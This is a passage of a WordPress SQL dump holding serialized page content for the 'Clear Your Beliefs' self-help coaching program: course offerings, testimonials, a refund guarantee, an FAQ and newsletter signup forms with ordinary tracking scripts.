href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top"><FONT COLOR="#2E2EFE">Up To Top</a></font></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<ul class="icon_box-ul">\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\n	<li><strong>Optional:</strong> Professional Coaching Sessions.</li>\n</ul>\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<div style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<div class="parg-text"><p><strong>Q: What is a virtual course?</strong></p></div>\n\n<div class="parg-text"><p>A: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.</p></div>\n\n<div class="parg-text"><p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p></div>\n\n<div class="parg-text"><p><strong>Q: How long will I have access to the course?</strong></p></div>\n\n<div class="parg-text"><p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: Are there scholarships available?</strong></p></div>\n\n<div class="parg-text"><p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">info@clearyourbeliefs.com</a></font>, with a description of your circumstances and your offer of what you can pay.</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your refund policy?</strong></p></div>\n\n<div class="parg-text"><p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: How can I reach Customer Support?</strong></p></div>\n\n<div class="parg-text"><p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. We’ll get back to you within 48 hours (sometimes longer over weekends).</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your Privacy Policy?</strong></p></div>\n\n<div class="parg-text"><p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" ><FONT COLOR="#2E2EFE">ClearYourBeliefs.com</a></font>, <a href="http://www.BeliefCloset.com" target="_blank" ><FONT COLOR="#2E2EFE">BeliefCloset.com</a></font>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" ><FONT COLOR="#2E2EFE">ConfusedAboutLove.com.</a></font></p></div>\n\n<div class="parg-text"><p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p></div>\n\n<div class="parg-text"><p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p></div>\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\n// ]]></script>";s:6:"filter";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:2:"20";s:4:"cell";s:1:"0";s:2:"id";s:2:"25";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:21:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"2";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"3";}i:7;a:1:{s:5:"cells";s:1:"1";}i:8;a:1:{s:5:"cells";s:1:"1";}i:9;a:1:{s:5:"cells";s:1:"1";}i:10;a:1:{s:5:"cells";s:1:"1";}i:11;a:1:{s:5:"cells";s:1:"2";}i:12;a:1:{s:5:"cells";s:1:"1";}i:13;a:1:{s:5:"cells";s:1:"1";}i:14;a:1:{s:5:"cells";s:1:"1";}i:15;a:1:{s:5:"cells";s:1:"1";}i:16;a:1:{s:5:"cells";s:1:"1";}i:17;a:1:{s:5:"cells";s:1:"1";}i:18;a:1:{s:5:"cells";s:1:"1";}i:19;a:1:{s:5:"cells";s:1:"1";}i:20;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:27:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.5984943538268507";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:10;a:2:{s:6:"weight";s:18:"0.8996235884567128";s:4:"grid";s:1:"6";}i:11;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:12;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}i:13;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"8";}i:14;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"9";}i:15;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"10";}i:16;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:2:"11";}i:17;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:2:"11";}i:18;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"12";}i:19;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"13";}i:20;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"14";}i:21;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"15";}i:22;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"16";}i:23;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"17";}i:24;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"18";}i:25;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"19";}i:26;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"20";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1626, 2055, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:164:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1461:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px; margin-top: 15px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Get the free eBook.</strong></p>\n\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input required id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input required id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1696:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n<center style="margin-bottom: -27px; margin-top: -7px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iclearit-App-logo_FINAL-246x300.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 32px;"><strong>Download the Free App</strong><br />for iPhone & iPad</p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -4px; padding:0 5px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<form style="position: relative; top: 10px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click �Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="Download the App" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -4px; padding:0 5px;">FREE (for a limited time)</p>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1438:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/11/cyb-3rd-head.jpg" alt="" />\n\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 10px; font-size: 16px;"><big><strong>Clear Your Limiting\nand Negative Beliefs</strong></big> <big><strong>\n- Permanently!</strong></big>\n\n<p class="tri-panel-p tri-panel-3rd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">A 7-week journey into your\nsubconscious mind to delete the beliefs that hold you back.\n\n<form target="_blank" class="infusion-form rd-form-1 rd-form-1-3rd" style="position: relative;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit�&quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2893:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li><em style="margin-left: -6px;">What do I want to experience?</em></li>\n	<li><em style="margin-left: -6px;">What belief is creating this experience I don''t want?</em></li>\n	<li><em style="margin-left: -6px;">How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:542:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center; margin: 0px 5%;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p>\n\n\n<hr 